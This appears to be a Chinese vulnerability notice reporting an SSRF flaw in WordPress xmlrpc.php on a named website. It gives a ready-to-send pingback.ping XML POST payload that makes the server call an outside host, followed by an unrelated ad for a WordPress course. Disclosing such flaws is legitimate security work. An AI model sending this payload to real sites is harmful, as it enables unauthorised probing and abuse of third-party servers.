WordPress xmlrpc.php 存在SSRF漏洞

漏洞证明

xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 验证方法:

POST http://baijie.joowp.com/xmlrpc.php
<?xml version="1.0" encoding="iso-8859-1"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>http://qxotxt.s0x.cn/</string></value></param>
    <param><value><string>http://baijie.joowp.com//?p=1</string></value></param>
    </params>
    </methodCall>

匹配内容:

阅读全文: WordPress xmlrpc.php 存在SSRF漏洞
wordpress课程

最新WordPress课程发布上线

收到诸多WordPress爱好者的建议,我们基于目前最新的WordPress版本录制了一套视频内容分享,旨在帮助更多的WordPress爱好者、用户能够快速掌控WordPress建站技巧和高级应用。本系列视频内容由六艺资深WordPress开发工程师David讲解。前半部分从初级了解WordPress到安装、配置自己的网站进行了介绍,由浅入深,是针对初学者很好的学习材料。后面的课程主要包含WordPress的常用页面构建器、主题管理等操作介绍。希望能帮到大家学习WordPress,欢迎留言交流!